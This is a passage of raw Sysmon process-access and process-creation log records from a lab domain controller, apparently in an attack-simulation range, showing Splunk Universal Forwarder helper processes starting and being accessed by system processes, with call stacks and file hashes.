EM32\ntdll.dll+51791 10341000x800000000000000018926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:44.552{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:44.552{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-95B8-6005-6505-00000000A301}6668C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:44.552{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95B8-6005-6505-00000000A301}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:44.553{59A5CD1D-95B8-6005-6505-00000000A301}6668C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.398{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95B9-6005-6605-00000000A301}1580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.398{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:45.398{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.397{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:45.397{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.397{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-95B9-6005-6605-00000000A301}1580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.397{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95B9-6005-6605-00000000A301}1580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:45.396{59A5CD1D-95B9-6005-6605-00000000A301}1580C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018955Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.833{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95BA-6005-6805-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000018954Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.833{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018953Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.833{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018952Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:46.833{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018951Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.833{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018950Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.833{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-95BA-6005-6805-00000000A301}6104C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018949Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.833{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95BA-6005-6805-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.834{59A5CD1D-95BA-6005-6805-00000000A301}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.224{59A5CD1D-95BA-6005-6705-00000000A301}68165108C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-95BA-6005-6705-00000000A301}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:46.068{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:05:46.068{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-95BA-6005-6705-00000000A301}6816C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:05:46.068{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-95BA-6005-6705-00000000A301}6816C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 